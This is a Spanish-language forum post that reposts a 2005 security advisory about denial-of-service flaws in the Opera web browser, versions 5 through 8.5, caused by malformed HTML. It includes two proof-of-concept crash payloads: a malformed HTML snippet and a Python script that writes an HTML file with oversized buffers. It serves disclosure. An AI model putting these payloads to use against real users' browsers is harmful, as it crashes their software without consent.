Foros de daboweb

SEGURIDAD INFORMATICA, Firewall, parches, vacunas, antivirus, anti troyanos, spyware etc => Seguridad Informatica - Firewall - Virus - Troyanos - Spyware - Ad Aware - Malware => Mensaje iniciado por: Liamngls en 23 de Octubre de 2005, 05:46:02 am

Título: Denegación de servicio en Opera Web Browser
Publicado por: Liamngls en 23 de Octubre de 2005, 05:46:02 am

Denegación de servicio en Opera Web Browser


Por Angela Ruiz
[email protected]

Opera Web Browser es propenso a múltiples vulnerabilidades que pueden resultar en un fallo del programa.

El problema se produce cuando el navegador intenta interpretar cierto contenido HTML creado maliciosamente.

No se ha comprobado que esta vulnerabilidad pueda ser utilizada para la ejecución remota de código.

Han sido publicados los siguientes ejemplos, que insertados en una página HTML serían capaces de hacer fallar a este navegador.

El primer ejemplo es un código HTML mal formado:

    <html><head></head><body><bdo>A<bgsound style=
    "margin:-99;">A<hr>A<hr></body></html>

El segundo ejemplo es el código de un script para Python, el conocido lenguaje interpretado, el cuál genera en este caso, contenido HTML:

    html = open("opera.html", "w")
    html.write("<html style=\"content: url(0);\">\n")
    html.write("<head></head>\n")
    buff1 = 'A'*32499
    html.write("<bodyA>\n"+buff1+"\n")
    buff2 = 'B'*153
    html.write("<u "+buff2+">\n")
    html.write("</body></html>")
    html.close()


Productos vulnerables:

- Opera Web Browser 8.5
- Opera Web Browser 8.0.2
- Opera Web Browser 8.0.1
- Opera Web Browser 8.0
- Opera Web Browser 7.54
- Opera Web Browser 7.53
- Opera Web Browser 7.52
- Opera Web Browser 7.51
- Opera Web Browser 7.50
- Opera Web Browser 7.23
- Opera Web Browser 7.22
- Opera Web Browser 7.21
- Opera Web Browser 7.20 Beta 1 build 2981
- Opera Web Browser 7.20
- Opera Web Browser 7.11.j
- Opera Web Browser 7.11.b
- Opera Web Browser 7.11
- Opera Web Browser 7.10
- Opera Web Browser 7.0 win32 Beta 2
- Opera Web Browser 7.0 win32 Beta 1
- Opera Web Browser 7.0 win32
- Opera Web Browser 7.0.3 win32
- Opera Web Browser 7.0.2 win32
- Opera Web Browser 7.0.1 win32
- Opera Web Browser 6.10 linux
- Opera Web Browser 6.0.5 win32
- Opera Web Browser 6.0.4 win32
- Opera Web Browser 6.0.3 win32
- Opera Web Browser 6.0.3 linux
- Opera Web Browser 6.0.2 win32
- Opera Web Browser 6.0.2 linux
- Opera Web Browser 6.0.1 win32
- Opera Web Browser 6.0.1 linux
- Opera Web Browser 6.0.1
- Opera Web Browser 6.0 win32
- Opera Web Browser 6.0.6
- Opera Web Browser 6.0.6 win32
- Opera Web Browser 6.0
- Opera Web Browser 5.12 win32
- Opera Web Browser 5.12
- Opera Web Browser 5.1.1 win32
- Opera Web Browser 5.1.0 win32
- Opera Web Browser 5.0.2 win32
- Opera Web Browser 5.0 Mac
- Opera Web Browser 5.0 Linux
- Opera Web Browser 8 Beta 3


Soluciones:

No existe al momento actual, ninguna solución oficial para este problema.


Relacionados:

Opera Web Browser Multiple Malformed HTML Parsing Denial Of Service Vulnerabilities
http://www.securityfocus.com/bid/15124/info

Fuente: http://www.vsantivirus.com/vul-opera-171005.htm